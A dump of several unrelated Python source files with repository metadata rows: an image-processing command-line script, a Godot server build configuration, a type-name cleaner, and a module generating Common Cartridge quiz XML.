def combine_images(image1, image2):
# let's combine two images using the squared sum of squares: value = sqrt(value_1**2, value_2**2)
# size of image1 and image2 MUST be the same
x_pixels, y_pixels, num_channels = image1.array.shape # represents x, y pixels of image, # channels (R, G, B)
new_im = Image(x_pixels=x_pixels, y_pixels=y_pixels, num_channels=num_channels) # making a new array to copy values to!
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x, y, c] = (image1.array[x, y, c]**2 + image2.array[x, y, c]**2)**0.5
return new_im
def show_image(in_image):
path="input/"
img = mpimg.imread(path+in_image)
imgplot = plt.imshow(img)
plt.show()
# check for necessary parts of the runtime environment
def check_env( in_image):
#check to verify that output/input dirs exist:
path = './output/'
is_path = os.path.isdir(path)
if not is_path:
print('local ./output dir must exist, cannot continue...')
print(quit)
quit()
#verify output is writeable
is_w = os.access(path, os.W_OK)
if not is_w:
print('local ./output dir must be writeable, cannot continue...')
print(quit)
quit()
path = './input/'
is_path = os.path.isdir(path)
if not is_path:
print('local ./input dir must exist, cannot continue...')
print(quit)
quit()
#verify input image
if in_image:
thefile = 'input/'+in_image
print('file path: '+thefile)
is_file = os.path.isfile(thefile)
if not is_file:
print(f'local ./input file {in_image} must exist, cannot continue...')
print(quit)
quit()
if imghdr.what(thefile) != 'png':
print('wrong image file type, cannot continue...')
print(quit)
quit()
def cmd():
print("routine cmd")
# setup command line args and parms
# optional args have --
# fixed (required args do not have --)
def arg_init():
parser = argparse.ArgumentParser(description='Process an image.')
parser.add_argument("cmd",help="command to this program",type=str)
parser.add_argument("image",help="input image name for the command",type=str)
parser.add_argument("--ulx",action='store_true',help="upperleft x in image")
parser.add_argument("--uly",action='store_true',help="upperleft y in image")
parser.add_argument("--brx",action='store_true',help="bottomright x in image")
parser.add_argument("--bry",action='store_true',help="bottomright y in image")
group = parser.add_mutually_exclusive_group()
group.add_argument('--v', action='store_true',help="add more text output")
group.add_argument('--q', action='store_true',help="minimal output")
args = parser.parse_args()
print(args.image)
#if args.cmd != "show" and args.cmd != "blur":
return args
#def show_image(filename):
if __name__ == '__main__':
args = arg_init()
check_env(args.image)
lake = Image(filename = 'lake.png')
city = Image(filename='city.png')
start_time = time.time()
# brightened_im = adjust_brightness(lake, 1.7)
# brightened_im.write_image('brightened.png')
# darkened_im = adjust_brightness(lake, 0.3)
# darkened_im.write_image('darkened.png')
# incr_contrast = adjust_contrast(lake, 2,0.5)
# incr_contrast.write_image('incr_contrast.png')
# decr_contrast = adjust_contrast(lake, 0.5,0.5)
# decr_contrast.write_image('decr_contrast.png')
# blur_3 = blur(city,3)
# blur_3.write_image('blur_k3.png')
# blur_15 = blur(city,15)
# blur_15.write_image('blur_k15.png')
# let's apply a sobel kernel on the x and y axis
# sobel_x = apply_kernel(city, np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]]))
# sobel_x.write_image('edge_x.png')
# sobel_y = apply_kernel(city, np.array([[1, 0, -1], [2, 0, -2], [1, 0, -1]]))
# sobel_y.write_image('edge_y.png')
# # this will show x and y edges
# sobel_xy = combine_images(sobel_x, sobel_y)
# sobel_xy.write_image('edge_xy.png')
if args.cmd == "show" and args.image:
show_image(args.image)
if args.cmd == "blur" and args.image:
blur_15 = blur(args.image,15)
blur_15.write_image(args.image+'blur_k15.png')
show_image(blur_k15.png)
if args.v:
print(f'total execution duration: {time.time() - start_time}s')
| 35.30131 | 162 | 0.671326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,569 | 0.441489 |
e6fab2043b0b6fa907bee5da86873ddbf2cfe3cf | 1,432 | py | Python | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | [
"CC-BY-3.0",
"MIT"
] | 24 | 2016-10-14T16:54:01.000Z | 2022-01-15T06:39:17.000Z | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | [
"CC-BY-3.0",
"MIT"
] | 17 | 2016-12-30T14:35:53.000Z | 2017-03-07T21:07:50.000Z | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | [
"CC-BY-3.0",
"MIT"
] | 9 | 2017-08-04T12:00:16.000Z | 2021-12-10T06:48:28.000Z |
import os
import sys
def is_active():
return True
def get_name():
return "Server"
def can_build():
if (os.name!="posix"):
return False
return True # enabled
def get_opts():
return [
('use_llvm','Use llvm compiler','no'),
('force_32_bits','Force 32 bits binary','no')
]
def get_flags():
return [
('builtin_zlib', 'no'),
]
def configure(env):
env.Append(CPPPATH=['#platform/server'])
if (env["use_llvm"]=="yes"):
env["CC"]="clang"
env["CXX"]="clang++"
env["LD"]="clang++"
if (env["colored"]=="yes"):
if sys.stdout.isatty():
env.Append(CXXFLAGS=["-fcolor-diagnostics"])
is64=sys.maxsize > 2**32
if (env["bits"]=="default"):
if (is64):
env["bits"]="64"
else:
env["bits"]="32"
#if (env["tools"]=="no"):
# #no tools suffix
# env['OBJSUFFIX'] = ".nt"+env['OBJSUFFIX']
# env['LIBSUFFIX'] = ".nt"+env['LIBSUFFIX']
if (env["target"]=="release"):
env.Append(CCFLAGS=['-O2','-ffast-math','-fomit-frame-pointer'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
env.Append(CPPFLAGS=['-DSERVER_ENABLED','-DUNIX_ENABLED'])
env.Append(LIBS=['pthread','z']) #TODO detect linux/BSD!
if (env["CXX"]=="clang++"):
env.Append(CPPFLAGS=['-DTYPED_METHOD_BIND'])
env["CC"]="clang"
env["LD"]="clang++"
| 17.679012 | 81 | 0.609637 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 697 | 0.486732 |
e6fe636ebee73df95de2568536aed7f6f3927fad | 458 | py | Python | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | [
"MIT"
] | null | null | null | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | [
"MIT"
] | null | null | null | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | [
"MIT"
] | null | null | null | """
Created on 17-June-2020
@author Jibesh Patra
The types extracted during runtime usually look something like --> <class 'numpy.ndarray'> or
<class 'seaborn.palettes._ColorPalette'> change them to --> ndarray, ColorPalette
"""
import re
remove_chars = re.compile(r'>|\'|<|(class )|_|(type)')
def process_types(tp: str) -> str:
cleaned_type = remove_chars.sub('', tp)
cleaned_type = cleaned_type.split('.')[-1].strip()
return cleaned_type
| 24.105263 | 93 | 0.696507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 262 | 0.572052 |
fc070f80801a319fdf697b23e027ce45aa2d558c | 26,632 | py | Python | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | [
"BSD-3-Clause"
] | 1 | 2021-02-12T09:34:07.000Z | 2021-02-12T09:34:07.000Z | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | [
"BSD-3-Clause"
] | null | null | null | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021, Dana Lehman
# Copyright (c) 2020, Geoffrey M. Poore
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion
BEFORE_ITEMS = '''\
<?xml version="1.0" encoding="UTF-8"?>
<questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd">
<assessment ident="{assessment_identifier}" title="{title}">
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_maxattempts</fieldlabel>
<fieldentry>1</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
cc_profile
</fieldlabel>
<fieldentry>
cc.exam.v0p1
</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
qmd_assessmenttype
</fieldlabel>
<fieldentry>
Examination
</fieldentry>
</qtimetadatafield>
</qtimetadata>
<section ident="root_section">
'''
AFTER_ITEMS = '''\
</section>
</assessment>
</questestinterop>
'''
GROUP_START = '''\
<section ident="{ident}" title="{group_title}">
<selection_ordering>
<selection>
<selection_number>{pick}</selection_number>
<selection_extension>
<points_per_item>{points_per_item}</points_per_item>
</selection_extension>
</selection>
</selection_ordering>
'''
GROUP_END = '''\
</section>
'''
TEXT = '''\
<item ident="{ident}" title="{text_title_xml}">
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>text_only_question</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>0</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry></fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
<presentation>
<material>
<mattext texttype="text/html">{text_html_xml}</mattext>
</material>
</presentation>
</item>
'''
START_ITEM = '''\
<item ident="{question_identifier}" title="{question_title}">
'''
END_ITEM = '''\
</item>
'''
ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>{question_type}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>{points_possible}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry>{original_answer_ids}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
'''
ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '')
ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY
ITEM_PRESENTATION_MCTF = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_lid ident="response1" rcardinality="Single">
<render_choice>
{choices}
</render_choice>
</response_lid>
</presentation>
'''
ITEM_PRESENTATION_MCTF_CHOICE = '''\
<response_label ident="{ident}">
<material>
<mattext texttype="text/html">{choice_html_xml}</mattext>
</material>
</response_label>'''
ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple')
ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE
ITEM_PRESENTATION_SHORTANS = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_ESSAY = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_UPLOAD = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
</presentation>
'''
ITEM_PRESENTATION_NUM = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib fibtype="Decimal">
<response_label ident="answer1"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_RESPROCESSING_START = '''\
<resprocessing>
<outcomes>
<decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/>
</outcomes>
'''
ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{answer_xml}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\
<varequal respident="response1">{answer_xml}</varequal>'''
ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\
<varequal respident="response1">{ident}</varequal>'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\
<not>
<varequal respident="response1">{ident}</varequal>
</not>'''
ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY = '''\
<respcondition continue="No">
<conditionvar>
<other/>
</conditionvar>
</respcondition>
'''
ITEM_RESPROCESSING_END = '''\
</resprocessing>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\
<itemfeedback ident="general_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\
<itemfeedback ident="correct_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\
<itemfeedback ident="general_incorrect_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\
<itemfeedback ident="{ident}_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str:
'''
Generate assessment XML from Quiz.
'''
xml = []
xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier,
title=title_xml))
for question_or_delim in quiz.questions_and_delims:
if isinstance(question_or_delim, TextRegion):
xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}',
text_title_xml=question_or_delim.title_xml,
assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}',
text_html_xml=question_or_delim.text_html_xml))
continue
if isinstance(question_or_delim, GroupStart):
xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}',
group_title=question_or_delim.group.title_xml,
pick=question_or_delim.group.pick,
points_per_item=question_or_delim.group.points_per_question))
continue
if isinstance(question_or_delim, GroupEnd):
xml.append(GROUP_END)
continue
if not isinstance(question_or_delim, Question):
raise TypeError
question = question_or_delim
xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}',
question_title=question.title_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices)
elif question.type == 'numerical_question':
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = f'text2qti_numerical_{question.id}'
elif question.type == 'essay_question':
item_metadata = ITEM_METADATA_ESSAY
original_answer_ids = f'text2qti_essay_{question.id}'
elif question.type == 'file_upload_question':
item_metadata = ITEM_METADATA_UPLOAD
original_answer_ids = f'text2qti_upload_{question.id}'
else:
raise ValueError
#Type Change for Schoology CC Import
if question.type == 'multiple_choice_question':
typechange = 'cc.multiple_choice.v0p1'
elif question.type == 'true_false_question':
typechange = 'cc.true_false.v0p1'
elif question.type == 'short_answer_question':
typechange = 'cc.fib.v0p1'
elif question.type == 'multiple_answers_question':
typechange = 'cc.multiple_response.v0p1'
elif question.type == 'essay_question':
typechange = 'cc.essay.v0p1'
else:
typechange = question.type
xml.append(item_metadata.format(question_type=typechange,
points_possible=question.points_possible,
original_answer_ids=original_answer_ids,
assessment_question_identifierref=f'text2qti_question_ref_{question.id}'))
if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'):
if question.type in ('true_false_question', 'multiple_choice_question'):
item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE
item_presentation = ITEM_PRESENTATION_MCTF
elif question.type == 'multiple_answers_question':
item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE
item_presentation = ITEM_PRESENTATION_MULTANS
else:
raise ValueError
choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml)
for c in question.choices)
xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices))
elif question.type == 'short_answer_question':
xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml))
elif question.type == 'numerical_question':
xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml))
elif question.type == 'essay_question':
xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml))
elif question.type == 'file_upload_question':
xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml))
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question'):
correct_choice = None
for choice in question.choices:
if choice.correct:
correct_choice = choice
break
if correct_choice is None:
raise TypeError
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
else:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'short_answer_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml))
varequal = []
for choice in question.choices:
varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'multiple_answers_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
varequal = []
for choice in question.choices:
if choice.correct:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}'))
else:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'numerical_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK)
if question.correct_feedback_raw is None:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK
else:
if question.numerical_exact is None:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK
else:
item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK
xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml,
num_exact=question.numerical_exact_html_xml,
num_max=question.numerical_max_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'essay_question':
xml.append(ITEM_RESPROCESSING_START)
xml.append(ITEM_RESPROCESSING_ESSAY)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
elif question.type == 'file_upload_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK)
xml.append(ITEM_RESPROCESSING_END)
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question',
'numerical_question', 'essay_question', 'file_upload_question'):
if question.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml))
if question.correct_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml))
if question.incorrect_feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
for choice in question.choices:
if choice.feedback_raw is not None:
xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}',
feedback=choice.feedback_html_xml))
xml.append(END_ITEM)
xml.append(AFTER_ITEMS)
return ''.join(xml)
| 40.474164 | 260 | 0.629769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13,072 | 0.490838 |
fc0c40028b9c4945addfec469dd5871c8f82e05b | 52 | py | Python | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | [
"MIT"
] | null | null | null | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | [
"MIT"
] | null | null | null | gemucator/__init__.py | philipwfowler/genucator | d43a79afe1aa81ca24d7ab4370ed230e08aa89bf | [
"MIT"
] | null | null | null | #! /usr/bin/env python
from .core import gemucator
| 13 | 27 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.423077 |
fc109f21dbb2efc4b477a59e275c911d6c56316e | 221 | py | Python | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
